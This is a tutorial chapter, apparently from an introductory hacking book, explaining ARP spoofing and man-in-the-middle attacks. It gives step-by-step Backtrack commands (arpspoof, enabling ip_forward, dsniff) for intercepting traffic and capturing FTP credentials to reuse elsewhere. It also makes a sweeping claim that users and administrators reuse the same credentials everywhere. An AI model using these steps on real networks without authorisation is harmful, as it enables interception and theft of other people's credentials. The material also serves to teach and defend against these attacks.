Man-in-the-Middle Attacks

 

Man-in-the-Middle Attacks 

A man-in-the-middle attack becomes a very sensible follow up action for a criminal hacker after he successfully performs a spoofing attack. While some passive hackers would be content in simply being able to view the data he needs and avoid manipulation while listening in on a vulnerable host, some may want to perform an active attack right after being able to successfully pull off a spoofing attack.

A man-in-the middle attack can be performed when a hacker conducts an ARP spoofing, which is done by sending false Address Resolution Protocol, or ARP, messages over the infiltrated local area network. When pulled off successfully, the falsified ARP messages allow the hackers MAC address to be successfully linked to an IP address of a legitimate user or an entire server in a targeted network. Once the hacker is able to link his MAC address to a legitimate IP address, the hacker will be able to receive all data that other users over the network sends over to the IP address he is using. Since he already has access to all data that the hacked user (the owner of the IP address) enters and the information that he is receiving over the network, the hacker can opt to do the following during an ARP spoofing session:

1. Session hijacking – this allows the hacker to use the spoofed ARP to steal a user’s session ID, and then use those credentials at a later time to gain access to an account

2. Denial of Service attack –This attack can be done when the ARP spoofing is done to link several multiple IP addresses to a targeted device’s MAC address. What happens in this type of attack is that all the data that is supposedly sent to other IP addresses are instead redirected to a single device, which can result in a data overload. You will know more about DoS attacks on a later chapter.

3. Man-in-the-middle attack – the hacker pretends to be non-existent in a network, and then intercept or modify messages that are being sent between two or more victims.

Here is how a hacker may conduct an ARP spoofing to perform a man-in-the-middle attack using a tool called Backtrack, a hacking toolkit that is similar to Kali Linux:

Step 1: Sniff out the data you need 

This can be done by using the tools Wireshark, dsniff, and tcpdump. By firing up these tools, you can see all the traffic that you can connect to through wireless or wired networks.

Step 2: Use a wireless adapter and put it into monitor mode

When you place your wireless adapter or your NIC into monitor mode, you will be able to pick up all the traffic available to your connection, even the ones that are not intended for your IP address. If you are connected to hubbed networks, you can pick up the traffic that you need without any difficulty. However, if you are planning to infiltrate a switched system, you may need to opt for a different tactic, since switches are regulate the traffic and ensure that specific data packets are sent to specific MAC addresses or IP addresses. 

If you want to bypass switches, or at least know what types of information are being sent to other users, you can attempt to change the entries on the CAM table that maps out IP and MAC addresses that send information to each other. If you change the entries, you can successfully get the traffic intended for somebody else. To do this, you need to perform an ARP spoofing attack. 

Step 3: Fire up Backtrack

Once you are able to pull up Backtrack, pull up three terminals. Afterwards, and do the following:

1. Replace the MAC address of the client that you are targeting with your MAC address. Enter the following string to tell the client that your MAC address is the server:

arpspoof [client IP] [server IP] 

2. Reverse the order of the IP addresses in the previous string that you used. This will tell the server that your computer is the client.

3. Now that you are pretending to be both the server and the client, you will now need to be able to receive the packets from the client and then forward it to the server, and also do the other way around.

If you are using Linux, you can make use of its built-in feature called ip_forward, which can enable you to forward packets that you receive. Once you turn that on, you will be able to forward the packets using ipforwarding by entering this command in Backtrack:

echo 1 > /proc/sys/net/ipv4/ip_forward 

Once you enter this command, your system will be placed right in the middle of both the client and the server. This means you can now receive and forward data sent between the client and the server.

4. Use Dsniff to check the traffic 

Now that you are able to get all the traffic being sent to and from the client and the server, you will be able to find all the traffic available. To do this, activate a sniffer tool on Backtrack by entering the command “dsniff”. After doing so, you will see that the dsniff is activated and is listening to the available traffic. 

5. Grab the credentials or the data that you need on the ftp

Now, all you need to do is to wait for the client to log in right into the ftp server. When that happens, you will immediately see what his username or password is. 

Since both users and administrators use the same credentials on all services or computer systems, you can use the credentials that you are able to receive to log in.